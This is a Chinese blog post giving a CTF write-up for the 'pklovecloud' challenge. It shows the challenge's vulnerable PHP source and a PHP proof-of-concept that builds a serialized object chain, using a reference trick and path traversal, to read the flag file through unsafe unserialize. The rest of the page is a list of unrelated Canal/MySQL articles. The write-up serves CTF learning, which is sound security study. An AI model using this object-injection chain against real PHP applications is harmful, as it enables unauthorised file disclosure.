NSSCTF[第五空间 2021]pklovecloud_WP

最新推荐文章于 2024-07-26 14:36:07 发布
最新推荐文章于 2024-07-26 14:36:07 发布
阅读量397 收藏 2
点赞数 6
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/DoNotShyDoIt/article/details/140572333
版权

NSSCTF[第五空间 2021]pklovecloud_WP

比赛源码

<?php 

include 'flag.php';

class pkshow 

{ 

  function echo_name()   

  {     

​    return "Pk very safe^.^";   

  } 

} 

 

class acp 

{  

  protected $cinder;                   //保护变量记得加url编码

  public $neutron;                     //用引用($neutron=&$ova)使二者相等

  public $nova;

  function __construct()                 //以后需要在私有和保护变量中赋值一个对象,可以用

  {                                      __construct()魔术方法来赋值

​    $this->cinder = new pkshow;

  } 

  function __toString()                 //触发__tostring()在下方传参时会用到echo函数导致触发

  {     

​    if (isset($this->cinder)) 

​      return $this->cinder->echo_name();                 2//cider=new ace();

  } 

} 

 

class ace

{  

  public $filename;   

  public $openstack;

  public $docker; 

  function echo_name()   

  {  

​    $this->openstack = unserialize($this->docker);            1//docker=null;  

​    $this->openstack->neutron = $heat;     

​    if($this->openstack->neutron === $this->openstack->nova)       1//openstack=new acp();

​    {

​    $file = "./{$this->filename}";

​      if (file_get_contents($file))     

​      {       

​        return file_get_contents($file);           1//file=flag.php

​      } 

​      else 

​      { 

​        return "keystone lost~"; 

​      }  

​    }

  } 

} 

 

if (isset($_GET['pks'])) 

{

  $logData = unserialize($_GET['pks']);

  echo $logData;                   //触发__tostring()函数

} 

else 

{ 

  highlight_file(__file__); 

}

?>

-----------------------------------------------------------------------------------------------------------------------

POC:

<?php

 

class acp

{

  protected $cinder;

  public $neutron;

  public $nova;

  function __construct()

  {

​    $this -> cinder =new ace();

  }

}

 

class ace

{

  public $filename="../nssctfasdasdflag";

  public $openstack;

  public $docker=null;

 

}

$a=new acp();

$a->nova=&$a->neutron;

$e=new ace();

$e->openstack=$e;

echo urlencode(serialize($a));

Filename=flag,网页输出的结果(在源码里)给了提示。

在这里插入图片描述

提示flag在nssctfasdasdflag中,于是更改filename。网页显示:

在这里插入图片描述

导致这个原因是在下面这个判断语句:

在这里插入图片描述

说明nssctfasdasdflag这个文件不存在此目录,于是猜测在上一个目录,更改pocFilename=…/nssctfasdasdflag。成功回显flag。

在这里插入图片描述

HY.YH
关注
canal实现Mysql数据同步
BUG指挥课堂
02-10 113
阿里巴巴MySQL数据库binlog增量订阅与消费组件,基于数据库增量日志解析,提供增量数据订阅与消费,目前主要支持了MySQL。Canal开源地址:https://github.com/alibaba/canal
实施数仓(七):Canal的原理
03-15 469
大家好,欢迎来到本篇博客,利用空闲的时间来分享自己所学的知识,帮助和博主一样刚处于起步阶段的同学,水平高,若有什么错误和纰漏之处恳请大佬吝赐教,目前个人博客只有优快云:https://zhenyu.blog.youkuaiyun.com/,感谢大家的支持,谢谢 送给大家一句话:今日事,今日毕 今日目标: Mysql主备复制原理 Canal原理Canal原理Mysql主备复制原理Canal工作原理组件介绍server/client交互协议[Canal服务端和客户端交互协议]canal client &.
Elastic:canal admin启动失败,且无日志
55555的博客
01-12 2377
背景 用canal做mysql同步数据到ES时,出现canal admin启动失败,且无日志的情况 解决 canal-admin是要求有启动顺序的,如果无法启动且无日志,将canal-deployer,canal-adapter先停用,再启动canal-admin
canal 日志适配器
weixin_43931625的博客
07-04 201
canal 日志适配器
**canal.service和canal.adapter启动没有反应没有日志输出**
weixin_45375089的博客
02-13 1331
原因:可能是由于服务器可用内存够,导致服务起来,建议可用内存在2G以上。如果是内存足,可用通过这个方式解决,注意本方案建议在测试机上操作。2.如果是内存足,可用调大虚拟内存。生产机调大虚拟内存会降低服务器性能。1.查看服务器可用内存。
canal正常启动,但是无法读取 bin log 日志,meta.data 文件的原因
weixin_43038063的博客
09-16 5850
canal 知道因为什么原因挂掉了,重启的话,adapter 端日志也显示启动正常,找了半天是因为 canalserver 端的配置出现问题,conf 目录下的 meta.dat 文件读取的文件存在,错误日志是这样的: 2019-09-15 23:59:21.853 [destination = testcore , address = /172.18.108.67:3306 , EventP...
Canal安装和配置,实现监听binlog日志
qq_45932382的博客
09-26 2593
canal监听binlog日志
mysql的数据表同步工具 canal的使用
健康平安的活着的专栏
09-06 1万+
canal是阿里巴巴旗下的一款开源项目,使用java语言进行开发,基于数据库增量日志解析,提供增量数据订阅与消费的功能。是一款很好用的数据库同步工具。目前只支持mysql。
Canal教程
qq_27960935的博客
04-02 676
Canal介绍 简介 基于 MySQL 数据库增量日志解析,提供增量数据订阅和消费 早期阿里巴巴因为杭州和美国双机房部署,存在跨机房同步的业务需求,实现方式主要是基于业务 trigger(触发器) 获取增量变更 从 2010 年开始,业务逐步尝试数据库日志解析获取增量变更进行同步,由此衍生出了大量的数据库增量订阅和消费业务,基于日志增量订阅和消费的业务包括 数据库镜像 数据库实时备份 索引构建和实时维护(拆分异构索引、倒排索引等) 业务 cache 刷新 带业务逻辑的增量数据处理 当前的
.Net Core Redis缓存预热及Canal数据同步
最新发布
m0_59178355的博客
07-26 1628
缓存预热是指在系统启动或特定时机前,将预计会被访问的数据加载到缓存中。这样做的目的是减少系统的响应时间和数据库的访问负担。在用户首次请求数据时,这些数据已经存在于缓存中,从而能够提供更快的响应速度。Canal 是一款开源的数据同步工具,由阿里巴巴开发。它主要用于从MySQL等关系型数据库中捕捉数据变更,并将这些变更实时同步到其他系统中。Canal 基于数据库的 binlog(Binary Log)机制来获取数据变更,通过解析 binlog 来实现数据的增量同步。
基于Canal和Kafka实现MySQL的Binlog近实时同步
m0_67698950的博客
05-27 607
前提# 近段时间,业务系统架构基本完备,数据层面的建设比较薄弱,因为笔者目前工作重心在于搭建一个小型的数据平台。优先级比较高的一个任务就是需要近实时同步业务系统的数据(包括保存、更新或者软删除)到一个另一个数据源,持久化之前需要清洗数据并且构建一个相对合理的便于后续业务数据统计、标签系统构建等扩展功能的数据模型。基于当前团队的资源和能力,优先调研了Alibaba开源中间件Canal的使用。 这篇文章简单介绍一下如何快速地搭建一套Canal相关的组件。 关于Canal# 简介# 下面的简介和下一
记录两个Windows和Mac上部署阿里Canal无法启动的神坑
Wjhsmart的博客
05-29 3391
本文主要记录一下部署Canal遇到的问题和解决方案,顺便记录一下相关的资料信息。
Flink电商指标分析项目(6)_实时数据同步系统介绍
Knight
03-17 507
目录实时数据同步系统目标业务同步系统需求分析业务场景`sqoop`解决方案一`logstash`解决方案二`canal`解决方案三![在这里插入图片描述](https://img-blog.csdnimg.cn/2021031017593999.png)Canal数据采集平台MySql安装`binlog`日志介绍开启`binlog`安装CanalCanal介绍Canal原理安装Canal 实时数据同步系统目标 理解canal数据同步解决方案 安装canal 实现Flink数据同步系统 业务同步系统需求
canal解析binlog异常 ,meta.dat中记录的binlog日志文件存在
热门推荐
qq_37670707的博客
03-01 1万+
2019-03-01 11:19:18.341 [destination = ldb , address = /172.19.33.26:3306 , EventParser] WARN c.a.o.c.p.inbound.mysql.rds.RdsBinlogEventParserProxy - —&amp;gt; begin to find start position, it will be lo...
笔记【尚硅谷】大数据Canal教程丨Alibaba数据实时同步神器
upward
03-02 968
笔记【尚硅谷】大数据Canal教程-Alibaba数据实时同步神器
canal异常 Could not find first log file name in binary log index file
guanking19的博客
12-16 4965
Could not find first log file name in binary log index file问题解决解决过程 问题 最近在使用canal来监测数据库的变化,处理变动的数据。由于有一段时间没有用了,这次启动日志文件中看到这个异常 Could not find first log file name in binary log index file,详细信息如下: 2020-12-16 19:14:42.053 [destination = tradeAndRefund , addr
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值